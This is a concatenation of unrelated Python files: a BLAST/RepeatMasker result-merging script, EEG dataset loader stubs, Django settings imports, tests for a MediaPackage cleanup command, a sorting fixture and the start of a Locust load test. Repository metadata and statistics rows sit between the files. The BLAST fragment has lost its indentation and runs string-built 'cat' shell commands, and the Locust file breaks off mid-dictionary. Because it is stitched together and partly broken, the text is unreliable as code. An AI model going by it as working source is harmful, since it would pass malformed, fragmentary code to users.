finaloutname=open(filename,'w')
finaloutname.write("Read_Name\tRead_Length\tHit_numb\tSubject_id\tMapped_Subject\tSubject_Acession_Number\tSubject_Length\tBit_score\tE-value\tHSP_hit_starts\tHSP_hit_ends\tHSP_Identity\tHSP_alignlength\tPercentage_identity\tQuery_coverage\tHSP_start\tHSP_end\tAlignedSeq\tFullQuery\tKingdom\tSubjectName\n")
finaloutname.close()
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".blastn.annotate.hittable."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >> "
concate_files = concate_files +filename
#concate_files = concate_files + cdir
#concate_files = concate_files +"/"
#concate_files = concate_files +"combine_results/"
#concate_files = concate_files +"Blastn"
#concate_files = concate_files +".blastn.annotate.hittable."
#concate_files = concate_files +str(id_step)
#concate_files = concate_files +"_"
#concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".unmappedblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"Blastn"
concate_files = concate_files +".unmappedblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mappedblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"Blastn"
concate_files = concate_files +".mappedblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
elif data_split[0] == "REPEATMASKER":
print "REPEATMASKER CONCATE";
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".afterrep.fq1"
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"RepeatMasker"
concate_files = concate_files +".afterrep.fq1"
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
elif data_split[0] == "PREMEGABLAST":
print "PREMEGABLAST Concate";
filename=cdir + "/"
filename=filename + "combine_results/"
filename=filename +"Premegablast"
filename=filename +".premega.annotate.hittable."
filename=filename +str(id_step)
filename=filename +"_"
filename=filename +str(dbindex)
finaloutname=open(filename,'w')
finaloutname.write("Read_Name\tRead_Length\tHit_numb\tSubject_id\tMapped_Subject\tSubject_Acession_Number\tSubject_Length\tBit_score\tE-value\tHSP_hit_starts\tHSP_hit_ends\tHSP_Identity\tHSP_alignlength\tPercentage_identity\tQuery_coverage\tHSP_start\tHSP_end\tAlignedSeq\tFullQuery\tKingdom\tSubjectName\n")
finaloutname.close()
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".premega.annotate.hittable."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >> "
concate_files = concate_files +filename
#concate_files = concate_files + cdir
#concate_files = concate_files +"/"
#concate_files = concate_files +"combine_results/"
#concate_files = concate_files +"Premegablast"
#concate_files = concate_files +".premega.annotate.hittable."
#concate_files = concate_files +str(id_step)
#concate_files = concate_files +"_"
#concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".unmappedpremega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"Premegablast"
concate_files = concate_files +".unmappedpremega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mappedpremega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"Premegablast"
concate_files = concate_files +".mappedpremega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
elif data_split[0] == "BLASTX":
print "BLASTX Concate"
filename=cdir + "/"
filename=filename + "combine_results/"
filename=filename +"Blastx"
filename=filename +".blastx.annotate.hittable."
filename=filename +str(id_step)
filename=filename +"_"
filename=filename +str(dbindex)
finaloutname=open(filename,'w')
finaloutname.write("Read_Name\tRead_Length\tHit_numb\tSubject_id\tMapped_Subject\tSubject_Acession_Number\tSubject_Length\tBit_score\tE-value\tHSP_hit_starts\tHSP_hit_ends\tHSP_Identity\tHSP_alignlength\tPercentage_identity\tQuery_coverage\tHSP_start\tHSP_end\tAlignedSeq\tFullQuery\tKingdom\tSubjectName\n")
finaloutname.close()
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".blastx.annotate.hittable."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >>"
concate_files = concate_files +filename
#concate_files = concate_files + cdir
#concate_files = concate_files +"/"
#concate_files = concate_files +"combine_results/"
#concate_files = concate_files +"Blastx"
#concate_files = concate_files +".blastx.annotate.hittable."
#concate_files = concate_files +str(id_step)
#concate_files = concate_files +"_"
#concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".unmappedblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"Blastx"
concate_files = concate_files +".unmappedblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mappedblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
concate_files = concate_files +"Blastx"
#concate_files = concate_files +namefile
concate_files = concate_files +".mappedblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
elif data_split[0] == "TBLASTX":
print "TBLASTX Concate"
filename=cdir + "/"
filename=filename + "combine_results/"
filename=filename +"TBlastx"
filename=filename +".tblastx.annotate.hittable."
filename=filename +str(id_step)
filename=filename +"_"
filename=filename +str(dbindex)
finaloutname=open(filename,'w')
finaloutname.write("Read_Name\tRead_Length\tHit_numb\tSubject_id\tMapped_Subject\tSubject_Acession_Number\tSubject_Length\tBit_score\tE-value\tHSP_hit_starts\tHSP_hit_ends\tHSP_Identity\tHSP_alignlength\tPercentage_identity\tQuery_coverage\tHSP_start\tHSP_end\tAlignedSeq\tFullQuery\tKingdom\tSubjectName\n")
finaloutname.close()
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".tblastx.annotate.hittable."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >>"
concate_files = concate_files +filename
#concate_files = concate_files + cdir
#concate_files = concate_files +"/"
#concate_files = concate_files +"combine_results/"
#concate_files = concate_files +"TBlastx"
#concate_files = concate_files +".tblastx.annotate.hittable."
#concate_files = concate_files +str(id_step)
#concate_files = concate_files +"_"
#concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".unmappedtblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"TBlastx"
concate_files = concate_files +".unmappedtblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mappedtblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
concate_files = concate_files +"TBlastx"
#concate_files = concate_files +namefile
concate_files = concate_files +".mappedtblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
elif data_split[0] == "TBLASTN":
print "TBLASTN Concate"
filename=cdir + "/"
filename=filename + "combine_results/"
filename=filename +"TBlastn"
filename=filename +".tblastn.annotate.hittable."
filename=filename +str(id_step)
filename=filename +"_"
filename=filename +str(dbindex)
finaloutname=open(filename,'w')
finaloutname.write("Read_Name\tRead_Length\tHit_numb\tSubject_id\tMapped_Subject\tSubject_Acession_Number\tSubject_Length\tBit_score\tE-value\tHSP_hit_starts\tHSP_hit_ends\tHSP_Identity\tHSP_alignlength\tPercentage_identity\tQuery_coverage\tHSP_start\tHSP_end\tAlignedSeq\tFullQuery\tKingdom\tSubjectName\n")
finaloutname.close()
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".tblastn.annotate.hittable."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >>"
concate_files = concate_files +filename
#concate_files = concate_files + cdir
#concate_files = concate_files +"/"
#concate_files = concate_files +"combine_results/"
#concate_files = concate_files +"TBlastn"
#concate_files = concate_files +".tblastn.annotate.hittable."
#concate_files = concate_files +str(id_step)
#concate_files = concate_files +"_"
#concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".unmappedtblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"TBlastn"
concate_files = concate_files +".unmappedtblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mappedtblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
concate_files = concate_files +"TBlastn"
#concate_files = concate_files +namefile
concate_files = concate_files +".mappedtblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concatloc = "cat " + cdir
concatloc = concatloc +"/"
concatloc = concatloc +namefile
concatloc = concatloc +".unmapped*.fq1."
concatloc = concatloc +str(id_step)
concatloc = concatloc +"_"
concatloc = concatloc +str(dbindex-1)
concatloc = concatloc +" >"
concatloc = concatloc + cdir
concatloc = concatloc +"/"
concatloc = concatloc +"combine_results/"
concatloc = concatloc +namefile
concatloc = concatloc +".unmappedfinal.fq1"
print concatloc
concatloc_cmd=commands.getstatusoutput(concatloc)
print concatloc_cmd
end_time = time.time()
timetaken= (end_time - start_time)
print "Time Taken:"
print timetaken
| 40.100299 | 311 | 0.745175 | 3,212 | 26,787 | 5.83873 | 0.060399 | 0.484377 | 0.455903 | 0.575877 | 0.879386 | 0.871387 | 0.858164 | 0.856351 | 0.855178 | 0.825744 | 0 | 0.002786 | 0.155673 | 26,787 | 667 | 312 | 40.16042 | 0.826414 | 0.138873 | 0 | 0.763359 | 0 | 0.01145 | 0.172262 | 0.098974 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.009542 | null | null | 0.125954 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
664cdb380bf51b910dc2a1f0a629042add3b4aa2 | 3,107 | py | Python | emotion-classification/src/data/load_public_datasets.py | hnguyen25/affective-reality | 7aa6be118c2850ba201271e55f16065a83de897a | [
"CECILL-B"
] | null | null | null | emotion-classification/src/data/load_public_datasets.py | hnguyen25/affective-reality | 7aa6be118c2850ba201271e55f16065a83de897a | [
"CECILL-B"
] | null | null | null | emotion-classification/src/data/load_public_datasets.py | hnguyen25/affective-reality | 7aa6be118c2850ba201271e55f16065a83de897a | [
"CECILL-B"
] | null | null | null | """
LOAD_PUBLIC_DATASETS
Huy Nguyen (2021)
Used to load cleaned EEG data from publicly available datasets, such as the DEAP and DREAMER datasets, into a common data format.
"""
class DreamerDataloader:
"""Used to load data obtained from the DREAMER public dataset.
Example:
Attributes:
"""
def load_raw_data(self, filepath : str):
"""
Args:
filepath (str): path to DREAMER file (must be in .mat format)
Returns:
numpy.array: raw data file loaded into python
"""
return None
def get_dataset_info(self, filepath : str):
"""
Args:
filepath (str): path to DREAMER file (must be in .mat format)
Returns:
dict: dictionary with important info about dataset
"""
return None
def load_data(self, filepath : str, num_subjects=-1, num_trials=-1, choose_randomly=False):
"""
Args:
filepath (str): path to DREAMER file (must be in .mat format)
num_subjects (int): if not -1, choose the number of participants from the dataset to pull data from; cannot exceed total number of participants as specified in get_dataset_info()
num_trials (int): if not -1, choose the number of trials for each participant to pull data from; cannot exceed total number of trials done in experiments as specified in get_dataset_info()
choose_randomly (bool): if num_subjects is not -1, then randomly choose subjects whose data will be loaded.
Returns:
numpy.array: loaded data in a shared data format
"""
return None
class DEAPDataloader:
"""Used to load data obtained from the DEAP public dataset.
Example:
Attributes:
"""
def load_raw_data(self, filepath : str):
"""
Args:
filepath (str): path to DREAMER file (must be in .mat format)
Returns:
numpy.array: raw data file loaded into python
"""
return None
def get_dataset_info(self, filepath : str):
"""
Args:
filepath (str): path to DREAMER file (must be in .mat format)
Returns:
dict: dictionary with important info about dataset
"""
return None
def load_data(self, filepath : str, num_subjects=-1, num_trials=-1, choose_randomly=False):
"""
Args:
filepath (str): path to DREAMER file (must be in .mat format)
num_subjects (int): if not -1, choose the number of participants from the dataset to pull data from; cannot exceed total number of participants as specified in get_dataset_info()
num_trials (int): if not -1, choose the number of trials for each participant to pull data from; cannot exceed total number of trials done in experiments as specified in get_dataset_info()
choose_randomly (bool): if num_subjects is not -1, then randomly choose subjects whose data will be loaded.
Returns:
numpy.array: loaded data in a shared data format
"""
return None | 35.306818 | 200 | 0.635983 | 414 | 3,107 | 4.690821 | 0.207729 | 0.067971 | 0.046344 | 0.058702 | 0.903193 | 0.903193 | 0.903193 | 0.873326 | 0.873326 | 0.873326 | 0 | 0.00639 | 0.294818 | 3,107 | 88 | 201 | 35.306818 | 0.879963 | 0.680399 | 0 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
b07d2a0e14ca02cced4978ef380070afedac256d | 178 | py | Python | trashtalk/settings/__init__.py | hcote/TrashTalk | eb60cff7451f8d26bf141123d6a3580167583827 | [
"MIT"
] | 8 | 2017-10-04T02:29:13.000Z | 2019-10-09T03:38:35.000Z | trashtalk/settings/__init__.py | hcote/TrashTalk | eb60cff7451f8d26bf141123d6a3580167583827 | [
"MIT"
] | 108 | 2017-09-15T23:13:12.000Z | 2018-05-21T18:26:15.000Z | trashtalk/settings/__init__.py | hcote/TrashTalk | eb60cff7451f8d26bf141123d6a3580167583827 | [
"MIT"
] | 10 | 2017-09-06T02:36:01.000Z | 2020-09-15T20:13:33.000Z | # pylint: disable=wildcard-import
import sys
from os.path import join
from .utils import PROJECT_PATH
sys.path.append(PROJECT_PATH)
sys.path.append(join(PROJECT_PATH, 'apps'))
| 19.777778 | 43 | 0.792135 | 28 | 178 | 4.928571 | 0.464286 | 0.23913 | 0.202899 | 0.26087 | 0.347826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101124 | 178 | 8 | 44 | 22.25 | 0.8625 | 0.174157 | 0 | 0 | 0 | 0 | 0.027586 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b0ad482a374263ed7799954041702eb55b748035 | 7,467 | py | Python | src/backend/marsha/core/tests/test_command_clean_mediapackages.py | insad/marsha | 3c6627b9a1debbb594e43233df7b7edb88f57f45 | [
"MIT"
] | 64 | 2018-04-26T23:46:14.000Z | 2022-03-26T21:32:23.000Z | src/backend/marsha/core/tests/test_command_clean_mediapackages.py | insad/marsha | 3c6627b9a1debbb594e43233df7b7edb88f57f45 | [
"MIT"
] | 533 | 2018-04-17T10:17:24.000Z | 2022-03-31T13:07:49.000Z | src/backend/marsha/core/tests/test_command_clean_mediapackages.py | insad/marsha | 3c6627b9a1debbb594e43233df7b7edb88f57f45 | [
"MIT"
] | 16 | 2018-09-21T12:52:34.000Z | 2021-11-29T16:44:51.000Z | """Tests for clean_mediapackages command."""
from io import StringIO
from unittest import mock
from django.core.management import call_command
from django.test import TestCase
from ..management.commands import clean_mediapackages
class CleanMediapackagesTest(TestCase):
"""Test clean_mediapackages command."""
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
def test_clean_mediapackages_no_mediapackage(
self, mock_mediapackage_channels, mock_medialive_indexed_channels
):
"""Command should do nothing when there is no mediapackage to process."""
out = StringIO()
mock_mediapackage_channels.return_value = []
mock_medialive_indexed_channels.return_value = {}
call_command("clean_mediapackages", stdout=out)
self.assertEqual("", out.getvalue())
out.close()
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
def test_clean_mediapackages_related_medialive(
self, mock_mediapackage_channels, mock_medialive_indexed_channels
):
"""Command should do nothing when there is related medialives."""
out = StringIO()
mock_mediapackage_channels.return_value = [{"Id": "MP1"}, {"Id": "MP2"}]
mock_medialive_indexed_channels.return_value = {
"MP1": {"Id": "ML1", "Name": "MP1"},
"MP2": {"Id": "ML2", "Name": "MP2"},
}
call_command("clean_mediapackages", stdout=out)
self.assertIn("Processing mediapackage channel MP1", out.getvalue())
self.assertIn("Processing mediapackage channel MP2", out.getvalue())
self.assertNotIn("Mediapackage channel MP1 deleted", out.getvalue())
self.assertNotIn("Mediapackage channel MP2 deleted", out.getvalue())
out.close()
@mock.patch.object(clean_mediapackages, "list_mediapackage_channel_harvest_jobs")
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
def test_clean_mediapackages_harvest_job_pending(
self,
mock_mediapackage_channels,
mock_medialive_indexed_channels,
mock_harvest_jobs,
):
"""Command should do nothing when there is a pending harvest job."""
out = StringIO()
mock_mediapackage_channels.return_value = [{"Id": "MP1"}]
mock_medialive_indexed_channels.return_value = {}
mock_harvest_jobs.return_value = [{"Status": "PENDING"}]
call_command("clean_mediapackages", stdout=out)
self.assertIn("Processing mediapackage channel MP1", out.getvalue())
self.assertNotIn("Mediapackage channel MP1 deleted", out.getvalue())
out.close()
@mock.patch.object(clean_mediapackages, "delete_mediapackage_channel")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channel_harvest_jobs")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
def test_clean_mediapackages_harvest_job_failed(
self,
mock_medialive_indexed_channels,
mock_mediapackage_channels,
mock_harvest_jobs,
mock_delete_mediapackage,
):
"""Command should delete channel when only a failed harvest job exists."""
out = StringIO()
mock_mediapackage_channels.return_value = [{"Id": "MP1"}]
mock_medialive_indexed_channels.return_value = {}
mock_harvest_jobs.return_value = [{"Status": "FAILED"}]
mock_delete_mediapackage.return_value = ["EP1", "EP2"]
call_command("clean_mediapackages", stdout=out)
self.assertIn("Processing mediapackage channel MP1", out.getvalue())
self.assertIn("Mediapackage channel endpoint EP1 deleted", out.getvalue())
self.assertIn("Mediapackage channel endpoint EP2 deleted", out.getvalue())
self.assertIn("Mediapackage channel MP1 deleted", out.getvalue())
out.close()
@mock.patch.object(clean_mediapackages, "list_mediapackage_channel_harvest_jobs")
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
def test_clean_mediapackages_harvest_jobs_failed_and_pending(
self,
mock_mediapackage_channels,
mock_medialive_indexed_channels,
mock_harvest_jobs,
):
"""Command should do nothing when failed and pending harvest job exists."""
out = StringIO()
mock_mediapackage_channels.return_value = [{"Id": "MP1"}]
mock_medialive_indexed_channels.return_value = {}
mock_harvest_jobs.return_value = [
{"Status": "FAILED"},
{"Status": "PENDING"},
]
call_command("clean_mediapackages", stdout=out)
self.assertIn("Processing mediapackage channel MP1", out.getvalue())
self.assertNotIn("Mediapackage channel MP1 deleted", out.getvalue())
out.close()
@mock.patch.object(clean_mediapackages, "list_mediapackage_channel_harvest_jobs")
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
def test_clean_mediapackages_harvest_jobs_pending_and_failed(
self,
mock_mediapackage_channels,
mock_medialive_indexed_channels,
mock_harvest_jobs,
):
"""Command should do nothing when pending and failed harvest job exists."""
out = StringIO()
mock_mediapackage_channels.return_value = [{"Id": "MP1"}]
mock_medialive_indexed_channels.return_value = {}
mock_harvest_jobs.return_value = [
{"Status": "PENDING"},
{"Status": "FAILED"},
]
call_command("clean_mediapackages", stdout=out)
self.assertIn("Processing mediapackage channel MP1", out.getvalue())
self.assertNotIn("Mediapackage channel MP1 deleted", out.getvalue())
out.close()
@mock.patch.object(clean_mediapackages, "delete_mediapackage_channel")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channel_harvest_jobs")
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
def test_clean_mediapackages_no_harvest_job(
self,
mock_mediapackage_channels,
mock_medialive_indexed_channels,
mock_harvest_jobs,
mock_delete_mediapackage,
):
"""Command should delete channel when no harvest job exists."""
out = StringIO()
mock_mediapackage_channels.return_value = [{"Id": "MP1"}]
mock_medialive_indexed_channels.return_value = {}
mock_harvest_jobs.return_value = []
mock_delete_mediapackage.return_value = ["EP1", "EP2"]
call_command("clean_mediapackages", stdout=out)
self.assertIn("Processing mediapackage channel MP1", out.getvalue())
self.assertIn("Mediapackage channel endpoint EP1 deleted", out.getvalue())
self.assertIn("Mediapackage channel endpoint EP2 deleted", out.getvalue())
self.assertIn("Mediapackage channel MP1 deleted", out.getvalue())
out.close()
| 43.923529 | 85 | 0.706174 | 798 | 7,467 | 6.289474 | 0.090226 | 0.136282 | 0.062762 | 0.083682 | 0.901574 | 0.88942 | 0.867105 | 0.840606 | 0.836621 | 0.814306 | 0 | 0.005796 | 0.191241 | 7,467 | 169 | 86 | 44.183432 | 0.825302 | 0.070979 | 0 | 0.8 | 0 | 0 | 0.226527 | 0.09331 | 0 | 0 | 0 | 0 | 0.140741 | 1 | 0.051852 | false | 0 | 0.037037 | 0 | 0.096296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b0e743ee9fb27bd3fec3d1879f3cd28a9736ae75 | 98 | py | Python | sorting/fixtures.py | gcvalderrama/python_foundations | 5ac045085dcc6c906729b481f833fa6a7889bd19 | [
"MIT"
] | null | null | null | sorting/fixtures.py | gcvalderrama/python_foundations | 5ac045085dcc6c906729b481f833fa6a7889bd19 | [
"MIT"
] | null | null | null | sorting/fixtures.py | gcvalderrama/python_foundations | 5ac045085dcc6c906729b481f833fa6a7889bd19 | [
"MIT"
] | null | null | null |
def basic_array():
return [19, 2, 31, 45, 30, 11, 121, 27], [2, 11, 19, 27, 30, 31, 45, 121]
| 24.5 | 77 | 0.530612 | 20 | 98 | 2.55 | 0.6 | 0.156863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.432432 | 0.244898 | 98 | 3 | 78 | 32.666667 | 0.256757 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
c6aff0602c3a485028b4d6e20b7fc55239e094b8 | 36,593 | py | Python | stress_test/kairon_stress_test.py | Shashank411/kairon | 8a3a083136d8cf89359021e49a7610509772ca9b | [
"Apache-2.0"
] | 97 | 2020-08-18T10:07:48.000Z | 2022-03-26T18:33:37.000Z | stress_test/kairon_stress_test.py | Shashank411/kairon | 8a3a083136d8cf89359021e49a7610509772ca9b | [
"Apache-2.0"
] | 276 | 2020-08-27T23:24:35.000Z | 2022-03-31T09:43:30.000Z | stress_test/kairon_stress_test.py | Shashank411/kairon | 8a3a083136d8cf89359021e49a7610509772ca9b | [
"Apache-2.0"
] | 46 | 2020-09-11T13:29:41.000Z | 2022-03-08T12:27:17.000Z | import inspect
import logging
import os
from locust import HttpUser, between, SequentialTaskSet, task
from locust.exception import StopUser
from mongoengine import connect, disconnect
from rasa.shared.utils.io import read_config_file
from smart_config import ConfigLoader
from stress_test.data_objects import User, Bot, Account
USER_INDEX = 1
class ExecuteTask(SequentialTaskSet):
"""
Load test for kairon.
locust -f stress_test/kairon_stress_test.py --headless -u 1000 -r 100 --host=http://localhost:8080
u: number of users
r: rate at which users are spawned
host: base url where requests are hit
headless: run with CLI only
To run from UI:
locust -f stress_test/kairon_stress_test.py -u 1000 -r 100 --host=http://localhost:8080
"""
wait_time = between(1, 2)
@task
class Register(SequentialTaskSet):
"""
Task to register user.
"""
@task
def register(self):
request_body = {
"email": self.user.email,
"first_name": self.user.first_name,
"last_name": self.user.last_name,
"password": self.user.password,
"confirm_password": self.user.password,
"account": self.user.account,
